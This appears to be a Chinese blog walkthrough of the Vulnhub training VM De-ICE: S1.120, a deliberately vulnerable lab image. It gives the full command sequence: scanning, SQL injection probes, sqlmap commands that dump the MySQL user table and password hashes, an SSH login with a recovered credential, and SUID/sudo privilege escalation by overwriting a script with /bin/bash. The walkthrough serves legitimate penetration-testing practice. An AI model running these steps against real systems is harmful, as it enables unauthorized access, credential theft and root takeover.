Vulnhub靶机:DE-ICE:S1.120

于 2024-09-13 21:19:40 发布
阅读量361 收藏 7
点赞数 6
分类专栏: Vulnhub靶机 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57289348/article/details/142220361
版权

0x01 项目地址

De-ICE: S1.120

0x02 靶机描述

De-ICE are Penetration LiveCD images available from http://forum.heorot.net and provide scenarios where students can test their penetration testing skills and tools in a legal environment.
De-ICE是可从http://forum.heorot.net获得的渗透LiveCD映像,并提供学生可以在法律的环境中测试其渗透测试技能和工具的场景。

0x03 环境搭建

靶机

DE-ICE:S1.120

仅主机模式 192.168.1.120

攻击机

kali

仅主机模式 192.168.1.128

注:靶机IP默认为静态IP:192.168.1.120,因此kali需设置为仅主机模式,配置为相同网段

0x04 详细步骤

1.主机发现

arp-scan -l

2.端口扫描

nmap -p- 192.168.1.120

可以看到开启了21、22、80、443、3306五个端口

先访问网页看一下

3.Web访问

浏览器访问192.168.1.120,可以看到有HomeAdd ProductView Products三个页面,Home页面即这个首页

Add Product页面是一个表单,可以填写产品名称、描述、价格还有提交按钮

View Products页面可以查看产品

4.漏洞挖掘

Add Product页面添加一个产品

然后在View Products页面查询一下该产品,发现url里带参数id

尝试一下SQL注入,构造payload

?id=1 and 1=1 --+

页面正常

?id=1 and 1=2 --+

页面异常

故可能存在数字型SQL注入

拿sqlmanp跑一下,验证一下

sqlmap -u "http://192.168.1.120/products.php?id=1" --batch

确认存在SQL注入

5.漏洞利用

sqlmap爆库

sqlmap -u "http://192.168.1.120/products.php?id=1" --dbs --batch

mysql库中的表

sqlmap -u "http://192.168.1.120/products.php?id=1" -D mysql --tables --batch

user表中的字段

sqlmap -u "http://192.168.1.120/products.php?id=1" -D mysql -T user --columns --batch

UserPassword字段中的内容

sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql -T user --users --passwords --batch

此外,SQLMAP还将自动执行用户密码的密码破解,最终得到一堆用户名/密码

6.SSH连接

经过一番尝试之后,用ccoffee用户成功登陆

ccoffee:whatever
ssh ccoffee@192.168.1.120

7.提权

尝试SUID提权

执行命令,枚举SUID权限的二进制文件

find / -perm -u=s -type f 2>/dev/null

这里找到getlogs.sh启用了SUID,可以执行命令

到该目录下,将getlogs.sh备份,并创建一个新的getlogs.sh文件

cd /home/ccoffee/scripts/
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" >  getlogs.sh
chmod 777 getlogs.sh

sudo执行getlogs.sh

sudo /home/ccoffee/scripts/getlogs.sh

提权成功!

MoYv70
关注
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1492
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
vulnhub系列:De-ICE_S1.120靶机
jq_j37的博客
07-30 417
靶机IP为静态IP:192.168.1.120,因此kali设置为仅主机,配置为相同网段。
Vuluhub靶机 De-ICE: S1.120(渗透测试详细)
2301_78721909的博客
07-30 388
Vuluhub靶机 De-ICE: S1.120 (from wuhu)
De-ICE_S1.120靶机渗透测试
weixin_58786230的博客
07-29 358
【代码】De-ICE_S1.120靶机渗透测试。
De-ICE_S1.120靶机
zdd1453691081的博客
07-29 164
【代码】De-ICE_S1.120靶机
Vulnhub靶机:driftingblues 2
qq_48904485的博客
01-13 600
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:driftingblues2(10.0.2.18)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/
3.DE-ICE: S1.140靶机
Sam5ara的博客
01-16 469
vulnhub
vulnhub】De-ICES1.120靶机
wbplife的博客
08-11 266
在列出的所有用户中,用户 ccoffee 为位于路径 /home/ccoffee/scripts/getlogs.sh 命令启用了 SUID 位,这意味着我们可以执行 getlogs.sh 命令内的任何命令。在执行 sudo –l 时,我们观察到在执行命令 /home/ccoffee/scripts/getlogs.sh 时没有为此用户设置密码。将 getlogs.sh 移动到 getlogs.sh.bak,然后使用以下代码创建一个新的 getlogs.sh 文件以生成 shell。
DE-ICE: S1.120打靶【附POC】(权限提升)
weixin_52487093的博客
07-30 552
1.安装虚拟主机,主机发现不了已解决;2.kali利用ssh连接不了,已找到替补方案;3.SUID提权
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4241
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2504
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8456
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】利用域名混淆绕过 CSRF 实现账户接管
等风来
09-08 326
传统的 CSRF 攻击依赖于表单提交,其中包含 application/x-www-form-urlencoded 或 multipart/form-data 类型的数据。这些表单数据可以直接由浏览器发送,而攻击者可以伪造表单提交。然而,application/json 类型的数据必须通过 JavaScript 的 fetch 或 XMLHttpRequest 发送,这要求攻击者的页面能够执行这段 JavaScript,并且满足 CORS(跨源资源共享)策略。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1187
本文主要介绍网络安全认识与学习规划
网络安全】漏洞挖掘之CVE-2019-9670+检测工具
最新发布
等风来
09-09 225
CVE-2019-9670 是一个与相关的严重漏洞。ZCS 中的 AutoDiscover 服务存在不正确的 XML 解析处理,该漏洞可被利用来注入恶意 XML 代码(例如外部实体注入(XXE)攻击),从而导致服务器任意文件读取或远程代码执行 (RCE)。Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1662
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值